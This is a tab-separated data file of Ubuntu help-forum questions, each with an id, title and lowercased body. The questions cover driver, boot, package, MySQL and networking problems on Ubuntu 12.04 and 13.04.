340228	can not install vlc due to unmet dependencies	i am using a 32-bit version of ubuntu , and i am trying to install vlc . but every time i do it , it shows unmet dependencies . i know this issue was addressed in vlc package dependencies can not be resolved but the problem is not solved in that thread . i have run the solution referred to in that thread and this is the output : gaidin @ ubuntu : ~ $ sudo apt-get install libgsm1 libschroedinger-1.0-0 libavcodec53 \libavcodec-extra-53 libavformat53 gstreamer0.10-ffmpeg \gstreamer0.10-plugins-bad ffmpeg reading package lists ... done building dependency tree reading state information ... done package gstreamer0.10-plugins-bad is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source however the following packages replace it : gstreamer0.10-plugins-good gstreamer0.10-plugins-base package gstreamer0.10-ffmpeg is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'gstreamer0.10-ffmpeg ' has no installation candidate e : package 'gstreamer0.10-plugins-bad ' has no installation candidate i am totally new to ubuntu . can someone please tell me how to solve this ?
340229	nvidia geforce 6150 ge crash ubuntu 13.04	i decided to do a clean install of ubuntu 13.04 on my desktop computer . it worked fine for the first 30 minutes or so but then the graphics crashed ( after i had logged in so there is no problem with the computer ) . mini-pc emachines® el1200-07w : cpu : amd athlon™ 64 processor 1.6ghz chipset : nvidia® geforce® 6150se memory : 2048mb ddr2 ( 2 × 1024mb ) -expandable to 4gb- hard drive : 160gb sata ii video : nvidia® geforce® 6150se integrated graphics ( up to 128mb of shared video memory )
340231	download speeds extremely slow	i recently installed ubuntu 13.04 on an asus k55n laptop , and i have found that when i attempt to download the kde desktop , i get download speeds that vary between less than 1kbs to nearly 1mbs , which is still a fraction of my 20mbs connection i only have this problem when using ubuntu , i get normal speeds while downloading in windows .
340240	wireless still does not work 12.04 dell dimension 3000	i have tried many solutions found in aksubuntu , but no luck in getting the wireless to work on this computer . the wired connection works . below is the wireless information . 01:01.0 network controller : broadcom corporation bcm4318 [ airforce one 54g ] 802.11g wireless lan controller ( rev 02 ) subsystem : linksys wmp54gs v1.1 802.11g wireless-g pci adapter with speedbooster flags : bus master , fast devsel , latency 64 , irq 22 memory at feafe000 ( 32-bit , non-prefetchable ) [ size=8k ] kernel driver in use : wl kernel modules : wl , ssb all available updates were downloaded and installed 09/01/13 . the b43 cutter and installer were tried and the placing of the ' # ' in front of the blacklisted bcm43xx has been tried ( # bcm43xx ) . hardinfo was installed also . i am new to linux , but i am determined to learn all that i can to get this computer fully functional on this os .
340241	how to make my application accept folders from unity launcher ?	when dragging a file , all the entries on the launcher that are able to open that file stay lightened while the others fade . as far as i know , this is based on the mime types specified on the .desktop file of each application . i would like my application to be able to accept folders as arguments through the unity launcher . i have added mimetype=inode/directory ; to my .desktop file but to no avail . any ideas ? edit : this is my full .desktop file : [ desktop entry ] version=4 name=wallch comment=change desktop wallpapers automatically exec=/usr/bin/wallch % u icon=wallch terminal=false type=application categories=utility ; application ; mimetype=inode/directory ; actions=start ; change_wallpaper ; [ desktop action start ] name=start exec=/usr/bin/wallch -- start targetenvironment=unity [ desktop action change_wallpaper ] name=change wallpaper exec=/usr/bin/wallch -- change targetenvironmet=unity
340243	how do i change back to my x-session ( gui ) tty ?	my screensaver unlock screen got frozen , and fishing around i found that i could use ctrlaltf2 to switch tty 's and get a ( text only ) terminal login . the helpful pages that mentioned this , did n't however mention how to get back to my normal ubuntu gui session . how do i do that ? ?
340247	how to configure grub to boots ubuntu and windows installed in different disks ?	my system is a windows xp system running for years but with the recent news of lost support i decided it was time to give ubuntu ( linux ) a serious look . my windows resides on drive 0 and my install of ubuntu 13.04 resides on drive 1 . i felt it to be a better system with each on their own drives as i really do n't like splitting hd into partitions . currently i enter into the bios and chose which drive becomes the `` boot '' . very inconvenient ! ! my dilemma is how do i configure either `` boot.ini '' to give me a menu to boot either windows or ubuntu or configure grub to gives me the menu to boots either windows or ubuntu ? and how would i proceed to modify either ? i have some programming experience but this linux puts me in the newbie category .
340249	after a successful install , my screen blinks undefinetly	i have been here in the past to ask this same question , i 've been having issues with it for months and months , and months now - any help would be greatly appreciated . essentially when i install ubuntu - of any sort - it successfully installs but than the radeon graphics card driver apparently does n't work and the screen just turns on and off after boot . works great off usb . lspci | grep vga 00:02.0 vga compatible controller [ 0300 ] : intel corporation 2nd generation core processor family integrated graphics controller [ 8086:0116 ] ( rev 09 ) 01:00.0 vga compatible controller [ 0300 ] : advanced micro devices [ amd ] nee ati whistler [ radeon hd 6600m/6700m/7600m series ] [ 1002:6741 ] also , worth noting i 've tried multiple times to download the newest driver from radeon site and the .run opens so slow after 3 hours it was less than 25 % , needless to say i quit out of that each time ... . i 've tried all the drivers i was able to find ... and now i am unsure of how to even have these updates effect my actual filesystem on my pc - not just the usb , as i set up a 1.4g persistence . lastly it is worth noting that randomly it will work after the install , meaning , the graphics driver just works , the screen does not blink on and off . the only reason it does n't still work is i 've had to reinstall due to other issues . i am not very well versed in these things - but all i want to do is use my computer . after about 75 days the os is so buggy i have to reinstall . but i suppose that part is neither here nor there as all i want at the moment is to get this graphics card working . i do n't understand how if i set up a persistence file on my usb of studio 13 how the changes i make will effect the installed version of studio on my computers hdd . i found https : //help.ubuntu.com/community/radeondriver and many other pages but none have helped fix my issue i could really use some help here guys , not finding it in irc either . anything would be greatly , greatly appreciated .
340252	bash/terminal not dispalying devnagri script ( hindi/nepali ) properly	the bash terminal is not combing two unicode therefore anybody have the solution ?
340263	chromium web app integration notifications not working ?	ubuntu 13.04 , chromium 28 , unity-chromium-extension 2.4.7 . i was able to add google plus and gmail as short-cuts it seems . but when i set an email as read only i do not get a notification popup , nor does gmail under the task-bar icon show any emails as unread . the task-bar drop-down menu does show the gmail icon however . is there some setting i need to enable ? or is this a new bug that 2.4.7 was supposed to fix .
340264	webcam not working in ubuntu 13.04 ?	i have installed ubuntu 13.04 but my webcam is not working.my laptop is dell inspiron 3521 , it came with ubuntu installed and last time i remember webcam was working but now when i installed its not working . how can i fix this issue ? do i need some drivers for this ?
340265	sudo modprobe b43 not working in ubuntu 13.04	trying to get my wireless to work in ubuntu 13.04 to no avail . following the instructions in this question , when i get to the sudo modprobe b43 i add the -v to try and see what happens and it seems like it just hangs indefinitely after saying : insmod /lib/modules/3.8.0-29-generic/kernel/drivers/ssb/ssb.ko any ideas on what is happening and how i might fix it ?
340268	install ubuntu touch on toro	just wondering if there is an update to the problem of ubuntu touch not working on toro phones , and if not i am curious if it will ever be supported . i know the mobile phone market progresses at a rapid speed and people are focusing on the edge project .
340269	anyone can recommend a free and easy-to-use uml diagramming tool for beginners ?	i 'm trying to find a tool for creating uml diagrams for my work . usability is a major criteria for me . iâm just starting out , many things to learn . free would be great , but i would be glad to pay if the tool 's worth it . anyone have a good recommendation ?
340276	ubuntu is very slow	for some reason when i open up programs like firefox it take 3 seconds for it to open up . i have 8 gb of ram so it should be very fast . also got quad core 3.5 ghz . i already update it `` apt-get update & apt-get upgrade ''
340277	help with partitions/ changing existing partitions ?	my boot partition seems to be filling up . i assume it is from updates ? i 'm a few mb from maxing it out . can i take from adjacent partitions without damaging data ? from gparted sda1 ext4 boot 436 of 476mb used sda2 extended 148.5gb sda5 ext4 / 6.4 of 18.6gb used unallocated 18.6gb sda7 ext4 /home 67.8 of 107gb used unallocated 8gb sda6 ! unknown 3.72gb i think the 2 unallocated sections are from an older ubuntu version i do n't know what unknown/sda6 ! partition is . there 's a little warning that it might be damaged or unable to be identified by gparted .
340278	cinnamon desktop not working properly	i have installed cinnamon-desktop along with gnome-shell.i logged in once using cinnamon ( software rendering ) and after that when i login using cinnamon the panel is not shown until i open any application using run command.also the panel settings wo n't open . what should i do ? thank you .
340284	trouble installing driver for bcm43228 802.11a/b/g/n on thinkpad x131e	this is my first time asking a question on here , bare with me . so i have a brand new thinkpad x131e with a broadcom corporation bcm43228 802.11a/b/g/n wireless card . i currently have it dual booting ubuntu 12.04 lts and windows 7 professional . i am able to connect to wifi on windows but not on ubuntu . when i try to install the driver with the `` install additional drivers '' tool i get the the error '' sorry , installation of this driver failed . please have a look at the log file for details : /var/log/jockey.log '' i have tried using the firmware-b43-installer and b43-fwcutter packages , neither of which have done any good . i have tried uninstalling and re installing the bcmwl-kernel-source which did nothing . i have also been running sudo apt-get update in between most of my changes and i have restarted my system multiple times . i have also tried downloading the driver from broadcom and following the readme file install the driver which did not work . please let me know if you know of anything that i have n't tried . thanks in advance .
340286	my computer stops working after i choose install ubuntu 13.04	i can boot ubuntu easily and choose options but when i select install inside windows 8 and press continue , a black screen appears and ubuntu cd comes out and if i press a button , the computer restarts . i have windows 8 acer laptop .
340289	copy paste not working	i have ubuntu 12.10 installed on my machine ( not in virtualbox ) . it has been there for about two years ( i upgraded from 11.04 ) . i am using the default unity user interface . today copy/paste just stopped working ! in netbeans , gedit , firefox , etc . it also does n't work neither with the keyboard nor with the mouse . when i copy some text ( ctrl+c or right-click - > copy ) , i still have the paste mouse menu item disabled . however , in the terminal ctrl+insert and shift+insert work well , while shift+ctrl+c and shift+ctrl+v do n't work . i solved the issue , pretty strange though ! i had a wine application running , closing it results in copy/paste working again . when i open the application again , copy/paste stops working ! does anyone have an idea why ? any help is appreciated .
340295	changing default programs for a particular file type	another answer recommended `` right click on the .torrent file ... '' or `` firefox go to edit > preferences > applications change default application for magnet '' what do i do if i ca n't find the .torrent file ? where does my system put these by default ( as far as i know i have n't changed the default location ) ? when i try to change the firefox default application for magnet , i just get a file browser . where do i point it ? where does ubuntu store my programs , and what are their names ? in windows i 'd look in `` programs '' for an .exe file with the same name as the program i want to use , what do i look for in ubuntu ?
340301	i have to reload bashrc each time	despite the fact that i added some commands in .bashrc , i have to say `` source ~/.bashrc '' each time after rebooting . .bashrc path= $ path : $ home/.rvm/bin # add rvm to path for scripting export path=/opt/scala/sbt-0.12.2/bin : $ path without saying `` souce ~/.bashrc '' the command sbt does n't work . no command 'sbt ' found , did you mean : command 'st ' from package 'suckless-tools ' ( universe ) command 'sb ' from package 'lrzsz ' ( universe ) command 'mbt ' from package 'mbt ' ( universe ) command 'sbd ' from package 'cluster-glue ' ( main ) command 'sb2 ' from package 'scratchbox2 ' ( universe ) command 'skt ' from package 'latex-sanskrit ' ( universe ) command 'sbmt ' from package 'atfs ' ( universe ) command 'lbt ' from package 'lbt ' ( universe ) sbt : command not found
340307	automatically deleted mysql database table when restart server	i installed lamp server on my ubuntu 12.04 server pc . i changed the database storage location using my.cnf . after i changed the location it 's working fine . but if i restart my mysql database is deleted and my database shows empty . i do n't know why it happened , after i imported the dumb data to my previously created database , it shows the following error : create table if not exists `admin` ( `usna` varchar ( 100 ) not null , `pas` varchar ( 100 ) not null ) engine = innodb default charset = latin1 ; mysql said : documentation # 1146 - table 'admin_db.admin ' does n't exist ... but if create a new database and after that i import the data again , it will work fine . is my my.cnf file wrong ? please tell me how to fix this . my.cnf file # # the mysql database server configuration file . # # you can copy this to one of : # - `` /etc/mysql/my.cnf '' to set global options , # - `` ~/.my.cnf '' to set user-specific options . # # one can use all long options that the program supports . # run program with -- help to get a list of available options and with # -- print-defaults to see which it would actually understand and use . # # for explanations see # http : //dev.mysql.com/doc/mysql/en/server-system-variables.html # this will be passed to all mysql clients # it has been reported that passwords should be enclosed with ticks/quotes # escpecially if they contain `` # '' chars ... # remember to edit /etc/mysql/debian.cnf when changing the socket location . [ client ] port = 3306 socket = /var/run/mysqld/mysqld.sock # here is entries for some specific programs # the following values assume you have at least 32m ram # this was formally known as [ safe_mysqld ] . both versions are currently parsed . [ mysqld_safe ] socket = /var/run/mysqld/mysqld.sock nice = 0 [ mysqld ] # # * basic settings # user = mysql pid-file = /var/run/mysqld/mysqld.pid socket = /var/run/mysqld/mysqld.sock port = 3306 basedir = /usr datadir = /media/sdc1/mysql tmpdir = /tmp lc-messages-dir = /usr/share/mysql default-storage-engine=innodb skip-external-locking # # instead of skip-networking the default is now to listen only on # localhost which is more compatible and is not less secure . bind-address = 127.0.0.1 # # * fine tuning # key_buffer = 16m max_allowed_packet = 16m thread_stack = 192k thread_cache_size = 8 # this replaces the startup script and checks myisam tables if needed # the first time they are touched myisam-recover = backup # max_connections = 100 # table_cache = 64 # thread_concurrency = 10 # # * query cache configuration # query_cache_limit = 1m query_cache_size = 16m # # * logging and replication # # both location gets rotated by the cronjob . # be aware that this log type is a performance killer . # as of 5.1 you can enable the log at runtime ! # general_log_file = /var/log/mysql/mysql.log # general_log = 1 # # error log - should be very few entries . # log_error = /var/log/mysql/error.log # # here you can see queries with especially long duration # log_slow_queries = /var/log/mysql/mysql-slow.log # long_query_time = 2 # log-queries-not-using-indexes # # the following can be used as easy to replay backup logs or for replication . # note : if you are setting up a replication slave , see readme.debian about # other settings you may need to change . # server-id = 1 # log_bin = /var/log/mysql/mysql-bin.log expire_logs_days = 10 max_binlog_size = 100m # binlog_do_db = include_database_name # binlog_ignore_db = include_database_name # # * innodb # # innodb is enabled by default with a 10mb datafile in /var/lib/mysql/ . # read the manual for more innodb related options . there are many ! # # * security features # # read the manual , too , if you want chroot ! # chroot = /media/sdc1/mysql # # for generating ssl certificates i recommend the openssl gui `` tinyca '' . # # ssl-ca=/etc/mysql/cacert.pem # ssl-cert=/etc/mysql/server-cert.pem # ssl-key=/etc/mysql/server-key.pem [ mysqldump ] quick quote-names max_allowed_packet = 16m [ mysql ] # no-auto-rehash # faster start of mysql but no tab completition [ isamchk ] key_buffer = 16m # # * important : additional settings that can override those from this file ! # the files must end with '.cnf ' , otherwise they 'll be ignored . # ! includedir /etc/mysql/conf.d/
340312	sound problem - no audio input is shown i.e microphone is not visible . neigher `` headphone '' profile is available ?	sound problem - no audio input is shown i.e microphone is not visible , neither the `` headphone '' profile is available ! i have headphone connected and i can hear voices coming out of it ! i suspect cadence or gladish is responsible for this ! please help . i also suspect resetting all audio related settings to back to its factory state will solve this issue ! ! but i dont know how to do that ! ?
340315	differences of : softwarecenter history , dpkg-query and /var/log/dpkg.log . * ?	i have just again run across the problem `` find out which packages i installed some certain days ago '' . i have read several q & a on askubuntu and there are always different ways suggested to do this : use the history in the software center use dpkg-query -l ( though i can not seem to find any info on the install-date there browse through /var/log/dpkg.log ( not to forget ) the history in synaptic package manager my question is : am i correctly assuming that the information received is not always the same . for instance it appears to me that the history solutions of software-center and synaptic package manager are only showing packages that they have handled `` themselves '' . this means they omnit all those packages installed/removed/upgraded via the command line ( i.e . via dkpg or apt-get ) . can somebody help me out and ( a ) confirm that there is a difference and ( b ) maybe point out the differences to me . most interesting there is also the question if `` installation date/time recordings '' are only available via the browse /var/log/dpkg.log . * method ?
340316	my home folder is owned by root , how can i fix this ?	i put my home folder on its own partition following the instructions in the ubuntu documentation partitioning/home/moving wiki . now i 'm not the owner of my own home folder . how can i fix this ? i ca n't use wine because it says i have to be the owner of my home folder . when i use sudo nautilus then try to change permissions , it reverts to root every time i select myself or any other group . is there a command i can use to make myself the owner of my home folder ? i have already tried the following commands : sudo chown -r username /home/username â˘ this one would n't work , it replied : chown : can not access '/home/aaron/.gvfs ' : permission denied sudo chown -hvr username : username /home/username â˘ this one output all of my files ' names telling me that their ownership was changed , but when i went and checked it still said root .
340317	usb bootable linux	i have created the usb bootable linux on an flash drive . but when i start it up it keeps asking me to install linux . would installing linux install it on my desktop . is there a way to run linux off of the flash drive so that it wo n't affect my current operating system ? thanks !
340318	macbook air touchpad	i just installed ubuntu 13.04 on my macbook air . everything is working great except for one thing . the touchpad behaves slightly different than what it does on the macbook . in osx i can move the mouse event though another finger is touching the surface . ie . if one finger is still and another moves , the mouse moves as normal . this is not the case in ubuntu . the mouse stops moving as soon as the second finger touches the touchpad . this is very annoying because part of my palm or left thumb regularly hits it by accident , stopping the mouse-movement . not a big issue , but if i could get rid of it , that would be great . normal 2-finger-scroll works the same way it does on my mac , so it 's not because multi-touch is n't working , it seems . thanks alot in advance -viktor
340321	netbeans ca n't create project , it keeps loading	my netbeans ide ca n't create new projects . when i try to create a new project or run a existing one , it keeps saying : loading sample projects , please wait ... i 've installed java version 1.6.0
340322	linking a php script to an html document	i would like to run a php script which is the forr action in an html document . the html code i have is as follows < html > < head > < title > using php < /title > < /head > < body > < form action= '' form.php '' method= '' post '' > ip address : < input type= '' text '' name= '' ip '' > < input type= '' submit '' > < form > < /body > < /html > i am using ubuntu server 12.04 lts so i have saved this file to /var/www . the php script that i have titled form.php , which is also in /var/www is as follows < ? php echo `` todd '' ? > when i paste http : //10.0.0.98 into my browser , i get the form and when i click on submit , it downloads something which can not be opened . i would want to view the script results on the browser . i do not know where i am going wrong , still very much new to php .
340324	is exfat a good compromise for sharing a hard drive between linux and windows ?	i am currently dual booting linux and windows on my primary ssd which is split with ext4 and ntfs accordingly . however , i have a secondary hard drive where i would like to place my downloads and other large files . ideally , i would like this hard drive to be accessible by both my linux and windows partition . after doing some research i saw that exfat gives the benefits of fat32 but with less restrictions regarding file size . obviously using a non unix disk format would mean not being able to set permissions for files but i am ok with that . however doing some further research started to make me wonder whether linux has good drivers for exfat since it is done over fuse . what i would like to know is : is exfat the best disk format to use or should i be using something else ? are there any particular disadvantages i should be aware of because exfat uses fuse ? i also remember something about native exfat drivers being leaked by samsung recently . is it easy to set these up on kubuntu 12.04 ?
340325	problem connecting to isp server using xl2tpd as client . ubuntu server 13.04	i have followed guides found on google and ubuntu support pages and can get xl2tpd connection up but only under the following conditions : 1 - adsl model must be configured and connected to the isp or 2 - adsl modem in bridge mode i must have an existing pppoe connection established . if neither of the above are active xl2tpd wont trigger pppd and connect to the isp and thus tunnel connection fails to connect to the l2tp server of the isp . am i doing something wrong ; /etc/ppp/options.l2tpd.axxess ipcp-accept-local ipcp-accept-remote refuse-eap refuse-chap require-pap noccp noauth idle 1800 mtu 1200 mru 1200 defaultroute usepeerdns debug lock connect-delay 5000 name ( name used for ppp connection ) /etc/ppp/pap-secrets # * password ( name used for ppp connection as above ) * ( ppp password supplied by isp ) /etc/xl2tpd/xl2tpd.conf [ global ] ; global parameters : auth file = /etc/xl2tpd/l2tp-secrets ; * where our challenge secrets are access control = yes ; * refuse connections without ip match debug tunnel = yes [ lac axxess ] lns = 196.30.121.50 ; * who is our lns ? redial = yes ; * redial if disconnected ? redial timeout = 5 ; * wait n seconds between redials max redials = 5 ; * give up after n consecutive failures hidden bit = yes ; * user hidden avp 's ? length bit = yes ; * use length bit in payload ? require pap = yes ; * require pap auth . by peer require chap = no ; * require chap auth . by peer refuse chap = yes ; * refuse chap authentication require authentication = yes ; * require peer to authenticate name = bla85003 @ axxess ; * report this as our hostname ppp debug = yes ; * turn on ppp debugging pppoptfile = /etc/ppp/options.l2tpd.axxess ; * ppp options file for this lac /etc/xl2tpd/l2tp-secrets # secrets for authenticating l2tp tunnels # us them secret # * marko blah2 # zeus marko blah # * * interop * vzb_l2tp ( *** secret supplied by isp ) ^ isp server host name any help will be greatly appreciated
340328	ubuntu 13.04 on uefi system with windows boot manager as the main loader	on my old laptop ( legacy bios , mbr disk ) , this was perfectly possible to get working : i turn on the computer and see the windows boot manager i use easybcd ( or bootpart , or something else ) to add an option to the bcd menu which allows me to boot into grub , and then into ubuntu i ca n't figure how to do this on my new laptop ( uefi , gpt disk ) , whether in uefi or legacy mode . currently i 've installed ( and even booted ! ) ubuntu on my laptop , but only with the help of an external grub ( on a usb flash drive ) . how can i add grub as an option in the windows boot manager on a uefi laptop ? ( no , i do n't want to change my primary boot loader . so no , i do n't want to overwrite the windows boot loader with grub . )
340329	system fan always running	i have dell 3521 and switchable graphic intel and `` ati '' . my system fan always running and i ca n't reduce my screen brightness . how to fix this ? ? ? i install ubuntu 13.04 .
340331	ubuntu 12.04 lts not booting	i installed ubuntu 12.04 lts and it was working properly . i didnt use for one month and now when i boot it the screen becomes blank with a cursor blinking on it . what is the problem ?
340332	battery drains very fast	i am using hp pavillion notebok with windows and ubuntu dual boot , whenver i shutdown my laptop and start the ubuntu after some time , i founds that the charging is reduced very much . i have tried the hp 's utility for checking wethter battery is working fine or not and the utility says that it is working fine , so where it the problem
340334	problem detecting usb in 12.04 x64 , works on xubuntu 13.04 64x and windows	i am banging my head against the wall on this one . i have a sandisk extreme usb 3.0 64gb thumb drive that used to work on my box running 12.04 64bit , but now that box will not detect it in any way i can determine . i have tried it in several of the usb ports to no avail . it will detect and mount a other thumb drives , i have two others that work with no issues , a patriot memory 32gb drive , and an ironkey . the sandisk that does not get detected on the box running 12.04 64bit does get detected and mounted without issue on both my windows laptop and a box i have running xubuntu 13.04 . with the drive plugged in lsusb returned this : when i run dmesg i do not see any info related to this drive . this might be unrelated , but about the time my system quite seeing this thumb drive , it also started having issues mounting my iphone , i get the `` unhandled lockdown error ( -12 ) '' when i try . if there is any more information needed to help me on this please let me know . thanks to danatela and tarula for your replies . any thoughts ?
340340	how to allow ldap user to change password ?	i want to allow ldap user to change their password but how ? passwd ? or ldappasswd ? it wo n't work for me this time . what will be the configurations for this in order the user will successfully change their passwords ? any help will do . thanks .
340343	ubuntu seems corrupt	i 'm new to ubuntu and am trying to install it on my laptop for 2 days now without success . every time after installation it seems like it has been corrupted , like so : i have fujitsu siemens e8410 which contains a nvidia geforce go 8400m . i tried ubuntu 12.04 , both 32 and 64bit versions , ubuntu 13.04 64bit , installation with/without internet connection , always from dvd . hardware is ok since windows 7 64bit worked very fine on this machine prior to the ubuntu installation . i always let ubuntu installation choose disk settings - partitions , file system and stuff . i believe that computer is good enough to run ubuntu , why cant i get it working ?
340350	upgrade to the latest lts ubuntu server	i 've the old os installed in our server and i needed to install nodejs on the process i was required to update the system so i did apt-get update and in the process it breaks the libudev library and i keep on getting udev requires a kernel > = 2.6.32 not started failed when i start in result i can not login to the server via ssh or run screen command . i 'm thinking of upgrading the server os to ubuntu 12.04 lts . my question is how do i achieve this and what are the implications on the running applications on the server ? is there any safe way to upgrade but also ensuring the installed application runs smoothly ?
340352	are web apps still part of ubuntu 's future ?	i have been trying to find information about ubuntu web app api and integration but can only find api docs for 12.10 . has the api been abandoned or is this just a gap in the documentation ?
340353	ubuntu copy dialogue stops at the last moment for a long time	whenever i try and copy a file to an usb flash disk , the progress bar runs till the end very fast and stops for an indeterminable time before it is complete . is there an issue with ubuntu or my flash disk is what i am not able to figure out . all i want is a realistic copy dialogue
340356	manage space in ubutnu 12.04 installation	i am running a dual boot system with windows vista and ubuntu 10.04 . yesterday , i decided to re-install vista , but after that i was n't able to boot in ubuntu , so i want to take the chance to upgrade to 12.04 , and rearrange my hdd 's partitions . my plan is to split my 250 gb hdd as follows 120 gb vista 50-60 gb ntfs storage partition , that will be used both in vista and ubuntu 60-70 gb ubuntu i 've decided to use 4gb swap ( equal to my ram ) , but i do n't know how much space to give on / and /home . i suppose that in root directory / , all the programs are installed . in ubuntu i use cern 's root , maybe a bit of latex , i watch movies , browsing , pdf reading and stuff like that . so , how to arrange root directory and /home ? if i need more / space in future for program installation , will i be able to increase it ? in addition , is there a way to create a root account while installing ubuntu ?
340361	ca n't login after restoring backup with tar	i created backup of ~/ . with tar by the command-line . i excluded folders like /proc , /sys etc . but i included the /home folder because there are some important configuration files for settings of some apps ( firefox , vlc , installed fonts , etc ) . i restored the backup with live-cd and i booted without problems to the login screen where i can select my user . but i ca n't login a non-gui terminal appears and says could not write bytes : broken pipe . i deleted .xauthority , checked .xsession-errors for errors and nothing happens . i have used chown and chmod to own the files of my home directory , but the problem is still here . the problem is that i ca n't login to the guest , too . i ca n't login even if i create new user . the problem may be everywhere . any suggestions ? thank you !
340362	inserting data into mysql table using a script	i am trying to load data into mysql database using the following script # ! /bin/bash db_user='my_user ' ; db_passwd='passwd ' ; db_name='db_name ' ; table='rass ' ; input_file='/full/path/to/re.txt ' ; sql= '' use $ db_name ; load local data infile ' $ input_file ' replace into table ` $ table` lines terminated by '| ' character set utf8 ; '' mysql -- user= $ db_user -- password= $ db_passwd -- default_character_set utf8 $ db_name when i run the command , it displays the mysql manual and none of the data in the file is inserted . any ideas on how i can modify my code to insert the data
340363	i ca n't start xampp on ubuntu 13.04	i have installed xampp 1.8.3.1 .run file . and when i type /opt/lampp/lampp start then it gives me a message like this xampp : starting apache ... fail . xampp : another web server is already running . xampp : starting mysql ... ok. xampp : starting proftpd ... ok .
340371	can not install mysql on my ubuntu 12.04	i had trouble installing mysql server on my laptop . and now if i try installing anything new it gives an error message . i tried most of the sites but could not find a solution to my problem . when i run sudo apt-get install -f i get the following message : sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : mysql-server-5.5 suggested packages : tinyca mailx the following new packages will be installed : mysql-server-5.5 0 upgraded , 1 newly installed , 0 to remove and 497 not upgraded . 1 not fully installed or removed . need to get 0 b/8,719 kb of archives . after this operation , 31.3 mb of additional disk space will be used . do you want to continue [ y/n ] ? y preconfiguring packages ... ( reading database ... 152696 files and directories currently installed . ) unpacking mysql-server-5.5 ( from ... /mysql-server-5.5_5.5.32-0ubuntu0.12.04.1_i386.deb ) ... groupadd : can not lock /etc/group ; try again later . addgroup : `/usr/sbin/groupadd -g 139 mysql ' returned error code 10 . exiting . dpkg : error processing /var/cache/apt/archives/mysql-server-5.5_5.5.32-0ubuntu0.12.04.1_i386.deb ( -- unpack ) : subprocess new pre-installation script returned error exit status 1 no apport report written because maxreports is reached already errors were encountered while processing : /var/cache/apt/archives/mysql-server-5.5_5.5.32-0ubuntu0.12.04.1_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 )
340373	how to start a program always on second monitor	i tried to google and to browse/search the questions but with no luck . i have xubuntu 12.10 installed and extended desktop is working great ( intel display driver ) . the problem is that i want to start feh slideshow on startup on the second monitor . because of extended desktop i only have display=:0 and thus it is not possible to use display=:1 or :0.1 . i have a startup script which runs feh in startup and it does start on second monitor because it seems that the mouse pointer is about in the middle of the desktop . but the script runs feh over and over again to assure that feh gets refreshed file list in case there are new images in the directory ( a shared dropbox folder ) . so if the cursor happens to be on main monitor ( which it obviously is when using the computer ) feh starts on it and i have to move mouse pointer to second monitor and kill feh . so i was thinking if i would use two screens and define each monitor on its own screen but because of xfce there is no xorg.conf to configure two screens . i understand that it is though possible to use xorg.conf but how to configure it ? i tried googleing it also but with no luck again : ( so either i need a way to start feh always in the second monitor or a way to have feh understand there are new images in the directory : )
340379	installing universal usb installer on ubuntu 12.04	i want to uninstall ubuntu 12.04 and install ubuntu 13.4 instead . when i was installing ubuntu 12.04 from windows 7 i used universal usb installer to put .iso installer into my usb . now on ubuntu 12.04 i ca n't install universal usb installer ( it gives me an error ) . so how can i install universal usb installer on ubuntu 12.04 ? thanks .
340387	how can i get into gui mode ?	installed ubuntu-12.04.3 server . after installing , i could see only terminal mode login . i dont see the gui mode scree . how could i login to gui mode login ? if you need more details please let me know .
340391	how do i open the boot menu ?	i want to uninstall 12.04 and install ubuntu 13.04 instead . when i was installing ubuntu 12.04 from windows 7 opened the boot menu f12 . i have read that on ubuntu to enter the boot menu i have to press f2 or fn-f2 . i have tried both ways but it still does n't open the boot menu . so , how can i open the boot menu on ubuntu 12.04 ? note : i 'm using a lenovo thinkpad x120e .
340395	firefox rendering websites really slow	i have ubuntu 12.10 64-bit version running firefox 23.0 and my websites render significantly slower than if i run firefox on windows and slower than chrome on my computer . i have installed the proper drivers from ati and i have also tried : creating a new firefox profile . reinstalling graphics drivers . used bleachbit to clear all that had anything to do with firefox . purged firefox and re-installed it . if i check hardware acceleration in firefox it says i have hardware acceleration from my graphics card yet when i run a website with lots of javascript and ajax calls it all renders a bit slow . trying to run html5 games i get about half the fps that i get with chrome on the same computer . terminal output of running the lspci command : 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation xeon e3-1200/2nd generation core processor family pci express root port ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation 7 series/c210 series chipset family usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation 7 series/c210 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 1 ( rev c4 ) 00:1c.1 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 2 ( rev c4 ) 00:1c.2 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 3 ( rev c4 ) 00:1d.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation hm76 express chipset lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation 7 series chipset family 6-port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation 7 series/c210 series chipset family smbus controller ( rev 04 ) 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati thames xt/gl [ radeon hd 7600m series ] 07:00.0 network controller : ralink corp. device 539a 08:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 05 ) 09:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. rts5229 pci express card reader ( rev 01 )
340397	desable auto repeat mouse wheel left/right button of logitech mouse	i used this topic : how to assign `` back '' and `` forward '' actions to logitech anywhere mouse mx ' horizontal scroll wheel ? to link my logitech mouse buttons . it works well , except for the mouse wheel left and right buttons . i would like them to do copy and paste . so i tried this code ( in .xbindkeysrc ) : # copy '' xdotool key ctrl+c '' b:6 # paste '' xdotool key ctrl+v '' b:7 it works fine , but pressing a button act with auto repeat , so i get multiples pastes . i would like to disable the auto repeat for those two buttons , but the only method i know is with xset , but it only recognizes keycode , and i think that my tow button do n't have keycode . how can i do ?
